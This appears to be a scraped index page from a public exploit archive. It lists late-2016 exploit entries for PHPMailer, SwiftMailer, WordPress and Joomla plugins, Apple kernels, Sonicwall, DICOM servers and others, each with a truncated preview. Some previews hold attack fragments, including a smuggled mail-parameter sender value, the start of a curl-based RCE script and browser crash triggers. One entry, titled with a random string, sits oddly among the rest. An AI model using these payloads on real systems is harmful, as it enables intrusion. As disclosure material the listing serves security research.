SwiftMailer 5.4.5-DEV - Remote Code Execution

SwiftMailer 5.4.5-DEV - Remote Code Execution 09607 09607 09607 See the full advisory URL for the exploit details. / // Attacker's input coming from untrusted source such as $GET , $POST etc. // For example from a Contact form with sender field $emailfrom = '"attacker" -oQ/tmp/...

WordPress Plugin Simply Poll 1.4.1 - SQL Injection

WordPress Plugin Simply Poll 1.4.1 - SQL Injection Exploit Title: Simply Poll 1.4.1 Plugin for WordPress ­ SQL Injection Date: 21/12/2016 Exploit Author: TAD GROUP Vendor Homepage: https://wordpress.org/plugins/simply-poll/ Software Link: https://wordpress.org/plugins/simply-poll/ Contact:...

Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection

Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching = 2.6.0 Date: 28-12-2016 Software Link: http://awebsupport.com/products/aweb-cartwatching-system Exploit Author...

PHPMailer 5.2.20 - Remote Code Execution

PHPMailer 5.2.20 - Remote Code Execution !/usr/bin/python intro = """ PHPMailer RCE PoC Exploits PHPMailer " postfields = 'action':...

Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation

Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation ===================================================== Vendor Homepage: http://www.wampserver.com/ Date: 10 Dec 2016 Version : Wampserver 3.0.6 32 bit x86 Tested on: Windows 7 Ultimate SP1 EN Author: Heliand Dema Contact:...

Joomla! Component Blog Calendar - SQL Injection

Joomla! Component Blog Calendar - SQL Injection ========================================================================================== Joomla comblogcalendar SQL Injection Vulnerability ==========================================================================================...

PHPMailer 5.2.18 - Remote Code Execution (Bash)

PHPMailer 5.2.18 - Remote Code Execution Bash !/bin/bash CVE-2016-10033 exploit by opsxcq https://github.com/opsxcq/exploit-CVE-2016-10033 echo '+ CVE-2016-10033 exploit by opsxcq' if -z "$1" then echo '- Please inform an host as parameter' exit -1 fi host=$1 echo '+ Exploiting '$host curl -sq...

FTPShell Server 6.36 - .csv Local Denial of Service

FTPShell Server 6.36 - .csv Local Denial of Service Exploit FTPShell server 6.36 '.csv' CrashPoC Author: albalawisultan Tested on:win7 st :http://www.ftpshell.com/download.htm 1-open FTPShell Server Administrator 2-manage Ftp accounts 3-import from csv ban=...

Shutter 0.93.1 - Code Execution

Shutter 0.93.1 - Code Execution Exploit Title: Shutter user-assisted remote code execution Date: 2016-12-26 Software Link: http://shutter-project.org/ Version: 0.93.1 Tested on: Ubuntu, Debian Exploit Author: Prajith P Website: http://prajith.in/ Author Mail: [email protected] CVE: CVE-2016-10081 1...

PHPMailer 5.2.18 - Remote Code Execution (PHP)

PHPMailer 5.2.18 - Remote Code Execution PHP 09607 "; // ------------------ // mail param injection via the vulnerability in PHPMailer requireonce'class.phpmailer.php'; $mail = new PHPMailer; // defaults to using php "mail" $mail-SetFrom$emailfrom, 'Client Name'...

XAMPP Control Panel - Denial Of Service

XAMPP Control Panel - Denial Of Service ''' + Credits: John Page hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/XAMPP-CONTROL-PANEL-MEMORY-CORRUPTION-DOS.txt + ISR: ApparitionSec Vendor: ===================== www.apachefriends.org Product:...

Sonicwall 8.1.0.2-14sv - extensionsettings.cgi Remote Command Injection (Metasploit)

Sonicwall 8.1.0.2-14sv - extensionsettings.cgi Remote Command Injection Metasploit Exploit Title: Sonicwall extensionsettings scriptname Remote Command Injection Vulnerablity Date: 12/25/2016 Exploit Author: xort @ Critical Start Vendor Homepage: www.sonicwall.com Software Link:...

Sonicwall 8.1.0.2-14sv - viewcert.cgi Remote Command Injection (Metasploit)

Sonicwall 8.1.0.2-14sv - viewcert.cgi Remote Command Injection Metasploit Exploit Title: Sonicwall viewcert.cgi CGI Remote Command Injection Vulnerablity Date: 12/24/2016 Exploit Author: xort @ Critical Start Vendor Homepage: www.sonicwall.com Software Link:...

OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation

OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010 This issue affects OpenSSH if privilege separation is disabled config option UsePrivilegeSeparation=no. While privilege separatio...

OpenSSH 7.4 - agent Protocol Arbitrary Library Loading

OpenSSH 7.4 - agent Protocol Arbitrary Library Loading Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009 The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSHAGENTCADDSMARTCARDKEY and SSHAGENTCADDSMARTCARDKEYCONSTRAINED if OpenSSH was compiled...

Apache mod_session_crypto - Padding Oracle

Apache modsessioncrypto - Padding Oracle ''' Advisory: Padding Oracle in Apache modsessioncrypto During a penetration test, RedTeam Pentesting discovered a Padding Oracle vulnerability in modsessioncrypto of the Apache web server. This vulnerability can be exploited to decrypt the session data an...

Freepbx 2.11.1.5 - Remote Code Execution

Freepbx 2.11.1.5 - Remote Code Execution Exploit Title: Freepbx coockie recordings injection Google Dork: Ask Santa Date: 23/12/2016 Exploit Author: inj3ctor3 Vendor Homepage: https://www.freepbx.org/ Software Link: ISO LINKS IN SITE https://www.freepbx.org/ Version: ALL && unpatched/...

mZb7zr6L5z5T8xF

A Remote Browser's Agent XSS is a piece of software that allows a remote "operator" to control a browser as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, "XSS" software is usually associated with criminal or malicious activity...

Vesta Control Panel 0.9.8-16 - Local Privilege Escalation

Vesta Control Panel 0.9.8-16 - Local Privilege Escalation !/bin/bash Exploit Title: Vesta Control Panel 0.9.7 suid.c PWN Make PWN shell script executable. chmod...

Apple macOS 10.12.2 iOS 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free

Apple macOS 10.12.2 iOS 10.2 Kernel - ipcportt Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=926 mach ports are really struct ipcportt's in the kernel; this is a reference-counted object, ipreference...

Apple macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution

Apple macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=974 There are two ways for IOServices to define their IOUserClient classes: they can override IOService::newUserClient and allocate the...

Apple macOS 10.12.2 iOS 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation

Apple macOS 10.12.2 iOS 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=959 Proofs of Concept:...

Apple macOS 10.12.1 iOS 10.2 - syslogd Arbitrary Port Replacement

Apple macOS 10.12.1 iOS 10.2 - syslogd Arbitrary Port Replacement / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=977 syslogd running as root hosts the com.apple.system.logger mach service. It's part of the system.sb sandbox profile and so reachable from a lot of sandboxed...

Apple macOS 10.12.1 iOS 10.2 - powerd Arbitrary Port Replacement

Apple macOS 10.12.1 iOS 10.2 - powerd Arbitrary Port Replacement / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=976 powerd running as root hosts the com.apple.PowerManagement.control mach service. It checks in with launchd to get a server port and then wraps that in a CFPort:...

Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap Buffer Overflow (MS14-056)

Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap Buffer Overflow MS14-056 Security Settings - Choose a zone - Scripting should prevent websites from programmatically copy/pasting an image. Disabling execution of scripts on web-pages altogether will have the same...

Apple macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free

Apple macOS 10.12 - Double vmdeallocate in Userspace MIG Code Use-After-Free / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=954 Proofs of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40954.zip Userspace MIG services often use...

IBM AIX 6.17.17.2 - Bellmail Local Privilege Escalation

IBM AIX 6.17.17.2 - Bellmail Local Privilege Escalation !/usr/bin/sh CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root Affected versions: AIX 6.1, 7.1, 7.2 VIOS 2.2.x Fileset Lower Level Upper Level KEY --------------------------------------------------------- bos.net.tcp.client 6.1.9.0...

Apple macOS 10.12.2 iOS 10.2 - _kernelrpc_mach_port_insert_right_trap Kernel Reference Count Leak Use-After-Free

Apple macOS 10.12.2 iOS 10.2 - kernelrpcmachportinsertrighttrap Kernel Reference Count Leak Use-After-Free / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=941 Proofs of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40956.zip The...

Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)

Microsoft Edge - SIMD.toLocaleString Uninitialized Memory MS16-145 try var v = SIMD.Int32x41, 2, 3, 4; alertv.toLocaleString1, 2, 3, 4, 5, 6, 7; catche alerte.message;...

Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)

Microsoft Edge - Internationalization Initialization Type Confusion MS16-144 1; , set: function ; function f var i = Intl; Intl = ; // this somehow prevents an exception that prevents laoding di, "Collator", noobj; Objec...

NETGEAR WNR2000v5 - Remote Code Execution

NETGEAR WNR2000v5 - Remote Code Execution Remote code execution in NETGEAR WNR2000v5 - by Pedro Ribeiro [email protected] / Agile Information Security Released on 20/12/2016 NOTE: this exploit is "alpha" quality and has been deprecated. Please see the modules accepted into the Metasploit framework...

Google Android - WifiNative::setHotlist Stack Overflow

Google Android - WifiNative::setHotlist Stack Overflow Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=958 The following code in frameworks/opt/net/wifi/service/jni/comandroidserverwifiWifiNative.cpp doesn't validate the parameter params.numbssid, and then copies that number of...

Microsoft Internet Explorer 11 - MSHTML CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)

Microsoft Internet Explorer 11 - MSHTML CSplice­Tree­Engine::Remove­Splice Use-After-Free MS14-035 document.add­Event­Listener"DOMNode­Removed", function document.open; // free // attempt to modify freed memory here // because it will be...

Java Debug Wire Protocol (JDWP) - Remote Code Execution

Java Debug Wire Protocol JDWP - Remote Code Execution !/usr/bin/python Universal JDWP shellifier @hugsy And special cheers to @lanjelot import socket import time import sys import struct import urllib import argparse JDWP protocol variables HANDSHAKE = "JDWP-Handshake" REQUESTPACKETTYPE = 0x00...

WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection

WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection Exploit Title: Unauthenticated SQL injeciton in 404 plugin for Wordpress v1.0 Google Dork: N/A Date: 17/12/2016 Exploit Author: Ahmed Sherif Deloitte Vendor Homepage: N/A Software Link:...

Google Chrome 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T...::Quick­Get­Next Out-of-Bounds Read

Google Chrome 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T...::Quick­Get­Next Out-of-Bounds Read ''' Source: http://blog.skylined.nl/20161219001.html Synopsis A specially crafted HTTP response can allow a malicious web-page to trigger a out-of-bounds read vulnerability in Google Chrome. The...

Naenara Browser 3.5 (RedStar 3.0 Desktop) - JACKRABBIT Client-Side Command Execution

Naenara Browser 3.5 RedStar 3.0 Desktop - JACKRABBIT Client-Side Command Execution n0m3rcYn0M3rCyn0m3Rc N0MeRCYn0m3rCyn0m3rCyn0m n0MERCypDK var xunescape = unescape; oneblock = xunescape"%u0040%u1000"; stackpivot =...

RedStar 3.0 Server - Shellshock BEAM RSSMON Command Injection

RedStar 3.0 Server - Shellshock BEAM RSSMON Command Injection !/usr/bin/env python RedStar OS 3.0 Server BEAM & RSSMON shellshock exploit ======================================================== BEAM & RSSMON are Webmin based configuration utilities that ship with RSS server 3.0. These packages a...

ConQuest DICOM Server 1.4.17d - Stack Buffer (PoC)

ConQuest DICOM Server 1.4.17d - Stack Buffer PoC !/usr/bin/env python -- coding: utf8 -- ConQuest DICOM Server 1.4.17d Remote Stack Buffer Overflow RCE Vendor: University of Manchester. Developed by Marcel van Herk, Lambert Zijp and Jan Meinders. The Netherlands Cancer Institute Product web page:...

Microsoft Internet Explorer 9 - IEFRAME CMarkup­Pointer::Move­To­Gap Use-After-Free

Microsoft Internet Explorer 9 - IEFRAME CMarkup­Pointer::Move­To­Gap Use-After-Free !-- Source: http://blog.skylined.nl/20161215001.html Synopsis A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. The use appears to happen only once almost...

Horos 2.1.0 DICOM Medical Image Viewer - Denial of Service

Horos 2.1.0 DICOM Medical Image Viewer - Denial of Service !/usr/bin/env python -- coding: utf8 -- Horos 2.1.0 DICOM Medical Image Viewer Remote Memory Overflow Vulnerability Vendor: Horos Project Product web page: https://www.horosproject.org Affected version: 2.1.0 Summary: Horos™ is an...

WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1)

WordPress Plugin WP Private Messages 1.0.1 - SQL Injection 1 Exploit Title: WP Private Messages 1.0.1 – Plugin WordPress – Sql Injection Exploit Author: Lenon Leite Vendor Homepage: https://wordpress.org/plugins/wp-private-messages/ Software Link: https://wordpress.org/plugins/wp-private-messages...

WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection

WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 – WordPress Plugin – Sql Injection Exploit Author: Lenon Leite Vendor Homepage: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/...

Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)

Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free MS13-021 var o­Element = document.get­Element­By­Id"ruby"; var o­Element = o­Element.parent­Node.remove­Childo­Element; document.write""; document.document­Element.offset­Top; set­Timeout"location.reload", 100; !-- Time-lin...

OsiriX DICOM Viewer 8.0.1 - Memory Corruption

OsiriX DICOM Viewer 8.0.1 - Memory Corruption !/usr/bin/env python -- coding: utf8 -- OsiriX DICOM Viewer 8.0.1 dulparse.cc Remote Memory Corruption Vulnerability Vendor: Pixmeo Sarl Product web page: http://www.osirix-viewer.com Affected version: OsiriX 8.0.1 Summary: With high performance and a...

Apple macOS 10.12 16A323 XNU Kernel iOS 10.1.1 - set_dp_control_port Lack of Locking Use-After-Free

Apple macOS 10.12 16A323 XNU Kernel iOS 10.1.1 - setdpcontrolport Lack of Locking Use-After-Free Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=965 setdpcontrolport is a MIG method on the hostprivport so this bug is a root-kernel escalation. kernreturnt setdpcontrolport hostpri...

WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection

WHMCompleteSolution WHMCS Addon VMPanel 2.7.4 - SQL Injection ===================================================== Exploit Title : VMPanel 2.7.4 - SQL Injection Web Vulnerability Author : Esmaeil Rahimian Date Discovered : 2016-12-07 Affected Products: VMPanel v2.7.4 - Content Management System...

Horos 2.1.0 Web Portal - Directory Traversal

Horos 2.1.0 Web Portal - Directory Traversal Horos 2.1.0 Web Portal Remote Information Disclosure Exploit Vendor: Horos Project Product web page: https://www.horosproject.org Affected version: 2.1.0 Summary: Horos™ is an open-source, free medical image viewer. The goal of the Horos Project is to...

WordPress Plugin Quiz And Survey Master 4.5.44.7.8 - Cross-Site Request Forgery

WordPress Plugin Quiz And Survey Master 4.5.44.7.8 - Cross-Site Request Forgery alert1” in the questionname field then “question: ‘alert1’,” will get output inside the JS object. All good so far. However, in js/adminquestion.js on line 205, we see this line, as part of some JS-generated HTML:...

Orthanc DICOM Server 1.1.0 - Memory Corruption

Orthanc DICOM Server 1.1.0 - Memory Corruption !/usr/bin/env python -- coding: utf8 -- Orthanc DICOM Server 1.1.0 Remote Memory Corruption Vulnerability Vendor: Sébastien Jodogne Product web page: http://www.orthanc-server.com Affected version: 1.1.0 Summary: Orthanc is a Belgian, open-source,...